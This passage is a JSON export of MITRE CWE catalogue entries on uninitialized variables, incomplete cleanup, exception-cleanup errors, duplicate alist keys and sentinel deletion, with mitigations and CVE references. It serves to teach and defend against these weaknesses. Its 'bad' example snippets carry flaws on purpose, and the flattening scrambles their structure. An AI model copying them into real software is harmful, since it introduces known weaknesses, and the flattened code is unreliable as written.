code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"908","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Often"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"In C, using an uninitialized char * in some string libraries will return incorrect results, as the libraries expect the null terminator to always be at the end of a string, even if the string is empty."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Availability","Integrity","Other"],"Impact":"Other","Note":"Initial variables usually contain junk, which can not be trusted for consistency. This can lead to denial of service conditions, or modify control flow in unexpected ways. In some cases, an attacker can \\"pre-initialize\\" the variable using previous actions, which might enable code execution. This can cause a race condition if a lock variable check passes when it should not."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"Strings that are not initialized are especially dangerous, since many functions expect a null at the end -- and only at the end -- of a string."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Assign all variables to an initial value."},{"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":"Most compilers will complain about the use of uninitialized variables if warnings are turned on."},{"Phase":["Implementation","Operation"],"Description":"When using a language that does not require explicit declaration of variables, run or compile the software in a mode that reports undeclared or unknown variables. This may indicate the presence of a typographic error in the variable\'s name."},{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Architecture and Design","Description":"Mitigating technologies such as safe string libraries and container abstractions could be introduced."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code prints a greeting using information stored in a POST request:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (isset($_POST[\'names\'])) {}echo \\"Hello \\" . $nameArray[\'first\'];","xhtml:div":{"#text":"$nameArray = $_POST[\'names\'];","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}},"Body_Text":"This code checks if the POST array \'names\' is set before assigning it to the $nameArray variable. However, if the array is not in the POST request, $nameArray will remain uninitialized. This will cause an error when the array is accessed to print the greeting message, which could lead to further exploit."},{"Intro_Text":"The following switch statement is intended to set the values of the variables aN and bN before they are used:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int aN, Bn;switch (ctl) {}repaint(aN, bN);","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case -1:case 0:case 1:default:","xhtml:div":[{"#text":"aN = 0;bN = 0;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = i;bN = -i;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = i + NEXT_SZ;bN = i - NEXT_SZ;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = -1;aN = -1;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}},"Body_Text":"In the default case of the switch statement, the programmer has accidentally set the value of aN twice. As a result, bN will have an undefined value. Most uninitialized variable issues result in general software reliability problems, but if attackers can intentionally trigger the use of an uninitialized variable, they might be able to launch a denial of service attack by crashing the program. Under the right circumstances, an attacker may be able to control the value of an uninitialized variable by affecting the values on the stack prior to the invocation of the function."},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t unknown condition when i is the same value as err_val,\\n\\t\\t\\t because test_string is not initialized\\n\\t\\t\\t (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t (e.g. within a function body), test_string might be\\n\\t\\t\\t random if it is stored on the heap or stack. If the\\n\\t\\t\\t variable is declared in static memory, it might be zero\\n\\t\\t\\t or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n test_string might be an unexpected address, so the\\n printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t making sure that test_string has been properly set once\\n\\t\\t\\t it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t branch of the conditional - including the default/else\\n\\t\\t\\t branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2008-3688","Description":"Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2007-4682","Description":"Crafted input triggers dereference of an uninitialized object pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682"},{"Reference":"CVE-2007-3468","Description":"Crafted audio file triggers crash when an uninitialized variable is used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3468"},{"Reference":"CVE-2007-2728","Description":"Uninitialized random seed variable used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2728"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Uninitialized variable"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Uninitialized Variable"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL33-PL","Entry_Name":"Declare identifiers before using them","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-436"}},{"attr":{"@_External_Reference_ID":"REF-437"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 8: C++ Catastrophes." Page 143"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Variable Initialization", Page 312"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Uninitialized Variable","attr":{"@_Date":"2008-04-11"}}}},"458":{"attr":{"@_ID":"458","@_Name":"DEPRECATED: Incorrect Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because its name and description did not match. The description duplicated CWE-454, while the name suggested a more abstract initialization problem. Please refer to CWE-665 for the more abstract problem.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Incorrect Initialization","attr":{"@_Date":"2008-04-11"}}}},"459":{"attr":{"@_ID":"459","@_Name":"Incomplete Cleanup","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly \\"clean up\\" and remove temporary or supporting resources after they have been used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Insufficient Cleanup"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Confidentiality","Integrity"],"Impact":["Other","Read Application Data","Modify Application Data","DoS: Resource Consumption (Other)"],"Note":"It is possible to overflow the number of temporary files because directories typically have limits on the number of files allowed. This could create a denial of service problem."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Temporary files and other supporting resources should be deleted/released immediately after they are no longer needed."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Stream resources in a Java application should be released in a finally block, otherwise an exception thrown before the call to close() would result in an unreleased I/O resource. In the example below, the close() method is called in the try block (incorrect).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Throwable t) {}","xhtml:div":[{"#text":"InputStream is = new FileInputStream(path);byte b[] = new byte[is.available()];is.read(b);is.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"log.error(\\"Something bad happened: \\" + t.getMessage());","attr":{"@_style":"margin-left:10px;"}}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0552","Description":"World-readable temporary file not deleted after use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0552"},{"Reference":"CVE-2005-2293","Description":"Temporary file not deleted after use, leaking database usernames and passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2293"},{"Reference":"CVE-2002-0788","Description":"Interaction error creates a temporary file that can not be deleted due to strong permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0788"},{"Reference":"CVE-2002-2066","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2066"},{"Reference":"CVE-2002-2067","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2067"},{"Reference":"CVE-2002-2068","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2068"},{"Reference":"CVE-2002-2069","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2069"},{"Reference":"CVE-2002-2070","Description":"Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2070"},{"Reference":"CVE-2005-1744","Description":"Users not logged out when application is restarted after security-relevant changes were made.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1744"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Cleanup"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP14","Entry_Name":"Failure to release resource"}]},"Notes":{"Note":[{"#text":"CWE-459 is a child of CWE-404 because, while CWE-404 covers any type of improper shutdown or release of a resource, CWE-459 deals specifically with a multi-step shutdown process in which a crucial step for \\"proper\\" cleanup is omitted or impossible. That is, CWE-459 deals specifically with a cleanup or shutdown process that does not successfully remove all potentially sensitive data.","attr":{"@_Type":"Relationship"}},{"#text":"Overlaps other categories such as permissions and containment. Concept needs further development. This could be primary (e.g. leading to infoleak) or resultant (e.g. resulting from unhandled error conditions or early termination).","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"460":{"attr":{"@_ID":"460","@_Name":"Improper Cleanup on Thrown Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.","Extended_Description":"Often, when functions or loops become complicated, some level of resource cleanup is needed throughout execution. Exceptions can disturb the flow of the code and prevent the necessary cleanup from happening.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"The code could be left in a bad state."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If one breaks from a loop or function by throwing an exception, make sure that cleanup happens or that you should exit the program. Use throwing exceptions sparsely."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class foo {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static final void main( String args[] ) {}public static final boolean doStuff( ) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean returnValue;returnValue=doStuff();","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean threadLock;boolean truthvalue=true;try {}catch (Exception e){}return truthvalue;","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while() {}","xhtml:br":["","",""],"xhtml:i":"//check some condition","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"threadLock=true; //do some stuff to truthvaluethreadLock=false;","xhtml:br":["",""]}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.err.println(\\"You did something bad\\");if (something) return truthvalue;","xhtml:br":["",""]}}]}}],"xhtml:br":""}}}},"Body_Text":"In this case, you may leave a thread locked accidentally."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper cleanup on thrown exception"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR03-J","Entry_Name":"Restore prior object state on method failure"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"462":{"attr":{"@_ID":"462","@_Name":"Duplicate Key in Associative List (Alist)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error.","Extended_Description":"A duplicate key entry -- if the alist is designed properly -- could be used as a constant time replace function. However, duplicate key entries could be inserted by mistake. Because of this ambiguity, duplicate key entries in an association list are not recommended and should not be allowed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"694","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a hash table instead of an alist."},{"Phase":"Architecture and Design","Description":"Use an alist which checks the uniqueness of hash keys with each entry before inserting the entry."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code adds data to a list and then attempts to sort the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"alist = []while (foo()): #now assume there is a string data with a key basename","xhtml:br":"","xhtml:div":{"#text":"queue.append(basename,data)queue.sort()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Since basename is not necessarily unique, this may not sort how one would like it to be."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Duplicate key in associative list (alist)"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV02-C","Entry_Name":"Beware of multiple environment variables with the same effective name"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"463":{"attr":{"@_ID":"463","@_Name":"Deletion of Data Structure Sentinel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The accidental deletion of a data-structure sentinel can cause serious programming logic problems.","Extended_Description":"Often times data-structure sentinels are used to mark structure of the data structure. A common example of this is the null character at the end of strings. Another common example is linked lists which may contain a sentinel to mark the end of the list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the deletion or modification outside of some wrapper interface which provides safety.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"464","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Availability","Other"],"Impact":"Other","Note":"Generally this error will cause the data structure to not work 